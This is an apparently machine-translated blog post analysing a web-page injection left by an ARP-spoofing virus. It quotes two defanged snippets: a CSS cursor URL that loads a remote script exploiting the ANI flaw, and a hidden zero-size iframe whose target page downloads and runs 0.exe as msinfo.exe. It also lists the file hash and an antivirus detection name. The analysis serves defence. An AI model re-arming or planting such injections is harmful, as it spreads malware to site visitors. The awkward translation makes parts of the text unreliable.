EndurerOriginal
1Version
Analyzed
What about ARP virus "Eat ripba "?
Http://endurer.bokee.com/6277614.html
Http://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspx
Http://blog.sina.com.cn/u/49926d91010008q6
The automatically added URL hxxp: // www. z * PX ** 5 ** 2 * 0.com/020.0000.htm
There are two maliciousCode.
Its 1 is:
/---
<Body style = 'cursor: URL (hxxp: // Q ***. Z *** PX *** 5 *** 2 * 0.com/w*{}.js
) '>
---/
W ***. js uses the ani vulnerability to download 0.exe.
File Description: D:/test/0.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 10:51:40
Modification time: 10:51:40
Access time: 10:51:57
Size: 16652 bytes, 16.268 KB
MD5: 07c7128add5aed0197d66a15a59960d7
Kaspersky reportsTrojan-Downloader.Win32.Delf.bjy.
Its 2 is:
/---
<IFRAME src = "hxxp: // www. z * PX ** 5 ** 2 * 0.com/1***.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/
Hxxp: // www. the content of z * PX ** 5 ** 2 * 0.com/1***.htm is JavaScript and VBScript code, using ADODB. stream, Microsoft. XMLHTTP and scripting. fileSystemObject downloads 0.exe, save it as msinfo.exe, and create msinfo. vbs, and use shell. run the ShellExecute method of the Application Object Zhong.